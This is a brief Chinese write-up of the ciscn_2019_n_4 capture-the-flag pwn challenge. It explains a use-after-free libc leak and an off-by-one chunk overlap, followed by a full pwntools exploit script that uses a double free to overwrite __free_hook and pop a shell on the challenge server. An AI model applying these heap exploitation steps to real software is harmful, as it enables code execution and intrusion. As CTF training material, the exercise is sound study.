ciscn_2019_n_4

漏洞点还挺多的

uaf+off-by-one

通过uaf泄露libc，通过off-by-one达成overlap，来double free劫持free_hook即可

from pwn import *

#p=process('./ciscn_2019_n_4')
p=remote('node3.buuoj.cn',25496)
libc=ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
text='Your choice :'
def add(size,content):
    p.sendlineafter(':','1')
    p.sendlineafter(' ?',str(size))
    p.sendlineafter('nest?',content)

def edit(idx,content):
    p.sendlineafter(':','2')
    p.sendlineafter(' :',str(idx))
    p.sendlineafter('nest?',content)

def show(idx):
    p.sendlineafter(':','3')
    p.sendlineafter('Index :',str(idx))

def delete(idx):
    p.sendlineafter(':','4')
    p.sendlineafter('Index :',str(idx))

add(0x410,'p')#0
add(0x10,'p')#1

delete(0)
add(0x18,'ppppppp')#0
show(0)
print(hex(libc.symbols['__malloc_hook']))
libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-1120-libc.symbols['__malloc_hook']

add(0x10,'p')#2
add(0x10,'p')#3
add(0x10,'p')#4

one=libc.address+0x4f322
free_hook=libc.symbols['__free_hook']
edit(0,b'z'*0x10+p64(0x40)+b'\x81')#0
print(hex(libc.address))
delete(2)
delete(3)
add(0x71,b'p'*0x18+p64(0x21)+p64(free_hook))#2
delete(2)
add(0x10,'p')
add(0x10,p64(one))
#gdb.attach(p)
p.interactive()